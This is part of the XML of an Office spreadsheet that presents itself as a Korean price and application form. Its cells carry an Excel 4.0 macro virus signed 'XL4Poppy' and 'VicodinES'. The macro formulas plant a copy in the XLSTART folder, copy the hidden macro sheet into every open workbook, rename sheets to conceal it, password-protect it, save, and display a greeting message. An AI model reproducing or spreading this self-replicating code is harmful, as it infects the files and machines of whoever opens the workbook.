        <x:f>SET.VALUE($A$3,(GET.WORKSPACE(32)&amp;"\xlstart\Book1."))</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="19" spans="3:3" ht="12.75" customHeight="1">
      <x:c r="C19" s="5" t="e">
        <x:f>SET.NAME("Document_array",DOCUMENTS())</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="20" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A20" s="11" t="s">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C20" s="5" t="e">
        <x:f>SET.VALUE($A$1,INDEX(,2))</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="21" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A21" s="12" t="e">
        <x:f>IF(FILES(A3)="Book1.",0,99)</x:f>
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C21" s="5" t="e">
        <x:f>SET.VALUE($A$2,INDEX(,1))</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="22" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A22" s="5" t="e">
        <x:f>ERROR(TRUE,)</x:f>
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C22" s="5" t="e">
        <x:f>SET.VALUE($A$4,GET.DOCUMENT(3,"["&amp;A1&amp;"]"&amp;"XL4Poppy"))</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="23" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A23" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C23" s="10" t="e">
        <x:f>RETURN()</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="24" spans="1:1" ht="12.75" customHeight="1">
      <x:c r="A24" s="5" t="e">
        <x:f>RETURN()</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="25" spans="1:1" ht="12.75" customHeight="1">
      <x:c r="A25" s="5" t="e">
        <x:f>END.IF()</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="26" spans="1:3" ht="13.5" customHeight="1">
      <x:c r="A26" s="5" t="e">
        <x:f>NEW(1)</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
      <x:c r="C26" s="13" t="s">
        <x:v>19</x:v>
      </x:c>
    </x:row>
    <x:row r="27" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A27" s="5" t="e">
        <x:f>WORKBOOK.INSERT(1)</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
      <x:c r="C27" s="5" t="e">
        <x:f>RUN(C19)</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
    </x:row>
    <x:row r="28" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A28" s="5" t="e">
        <x:f>WORKBOOK.INSERT(1)</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
      <x:c r="C28" s="5" t="e">
        <x:f>ERROR(TRUE,)</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="29" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A29" s="5" t="e">
        <x:f>ACTIVATE.PREV()</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
      <x:c r="C29" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="30" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A30" s="5" t="e">
        <x:f>RUN(C18)</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
      <x:c r="C30" s="5" t="e">
        <x:f>RETURN()</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="31" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A31" s="5" t="e">
        <x:f>WORKBOOK.COPY("XL4Poppy",A1)</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
      <x:c r="C31" s="5" t="e">
        <x:f>ERROR(FALSE)</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="32" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A32" s="5" t="e">
        <x:f>WORKBOOK.NAME("Sheet3","Sheet99")</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
      <x:c r="C32" s="5" t="e">
        <x:f>ACTIVATE.PREV()</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
    </x:row>
    <x:row r="33" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A33" s="5" t="e">
        <x:f>WORKBOOK.NAME("Sheet1","Sheet3")</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
      <x:c r="C33" s="5" t="e">
        <x:f>RUN(C19)</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
    </x:row>
    <x:row r="34" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A34" s="5" t="e">
        <x:f>WORKBOOK.NAME("Sheet99","Sheet1")</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
      <x:c r="C34" s="5" t="e">
        <x:f>WORKBOOK.COPY("XL4Poppy",A1)</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
    </x:row>
    <x:row r="35" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A35" s="5" t="e">
        <x:f>PROTECT.DOCUMENT(TRUE,,"VicodinES",TRUE)</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
      <x:c r="C35" s="5" t="e">
        <x:f>END.IF()</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="36" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A36" s="5" t="e">
        <x:f>WORKBOOK.PREV()</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
      <x:c r="C36" s="10" t="e">
        <x:f>RETURN()</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="37" spans="1:1" ht="12.75" customHeight="1">
      <x:c r="A37" s="5" t="e">
        <x:f>WORKBOOK.PREV()</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
    </x:row>
    <x:row r="38" spans="1:1" ht="12.75" customHeight="1">
      <x:c r="A38" s="5" t="e">
        <x:f>WORKBOOK.PREV()</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
    </x:row>
    <x:row r="39" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A39" s="5" t="e">
        <x:f>SAVE.AS(A3)</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
      <x:c r="C39" s="12" t="e">
        <x:f>APP.TITLE("XF.Classic.Poppy")</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="40" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A40" s="5" t="e">
        <x:f>FILE.CLOSE()</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
      <x:c r="C40" s="5" t="e">
        <x:f>MESSAGE(TRUE,"VicodinES and Lord Natas greet you a good morning!")</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
    </x:row>
    <x:row r="41" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A41" s="10" t="e">
        <x:f>RETURN()</x:f>
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C41" s="10" t="e">
        <x:f>RETURN()</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
  </x:sheetData>
  <x:sheetProtection password="8863" sheet="1" objects="0" scenarios="0" formatCells="1" formatColumns="1" formatRows="1" insertColumns="1" insertRows="1" insertHyperlinks="1" deleteColumns="1" deleteRows="1" selectLockedCells="0" sort="1" autoFilter="1" pivotTables="1" selectUnlockedCells="0"/>
  <x:pageMargins left="0.74805557727813721" right="0.74805557727813721" top="0.98430556058883667" bottom="0.98430556058883667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3" baseType="lpstr">
      <vt:lpstr>예정가격</vt:lpstr>
      <vt:lpstr>신청서</vt:lpstr>
      <vt:lpstr>VXXXXXXX</vt:lpstr>
    </vt:vector>
  </ep:TitlesOfParts>
  <ep:AppVersion>8.5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관리과02</dc:creator>
  <cp:lastModifiedBy>user</cp:lastModifiedBy>
  <cp:revision>135</cp:revision>
  <cp:lastPrinted>2012-02-08T23:20:43.171</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2001-04-03T05:55:52.000</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-05-18T08:53:51.841</dcterms:modified>
</cp:coreProperties>
</file>